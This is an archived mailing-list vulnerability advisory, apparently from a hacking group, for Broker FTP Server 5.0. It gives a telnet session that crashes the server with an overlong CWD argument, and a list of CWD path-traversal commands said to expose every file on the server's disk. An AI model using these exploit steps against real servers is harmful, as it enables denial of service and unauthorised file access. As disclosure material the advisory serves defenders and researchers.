('binary' encoding is not supported, stored as-is) Product : Broker FTP Server Version : 5.0 OSystem : Windows Authors : TransSoft WebSite : http://www.ftp-broker.com Problem : * Buffer Overflow in field CWD * Access to all files on a disk #[Denial of Service]# Description: ------------ eng: ==== To arrange overflow in field CWD, necessary to send on it more than 256 bytes of dust. After that server will fall, and will not submit any life attributes. Exploit: -------- ************************************* >>Telnet 127.0.0.1:21 220 FTP Server Ready [***] >>USER anonymous 331 Password required for anonymous. >>PASS anonymous@localhost 230-Welcome to Broker FTP Server. 230- 230 User anonymous logged in. CWD AAAAAAAAAAA......AAAAA [256b] ************************************* #[Access to all files on a disk]# Description: ------------ rus: ==== За счет этой уязвимости вы можете получить доступ ко всем файлам на жестком диске сервера eng: ==== Due to this vulnerability you can get access to all files on a hard drive of the server Exploits: Current Directory : "/" CWD * CWD /* CWD /.. CWD /... CWD /.../ Contacts: --------- r2subj3ctat_private subj.24h.to (www.dwcgr0up.com/subj/) www.dwcgr0up.com irc.dwcgr0up.biz #dwc Thanks: ------- DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp, exploit.ru, nobodies DethSpirit, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, Demon.
This archive was generated by hypermail 2b30 : Tue Apr 01 2003 - 20:10:45 PST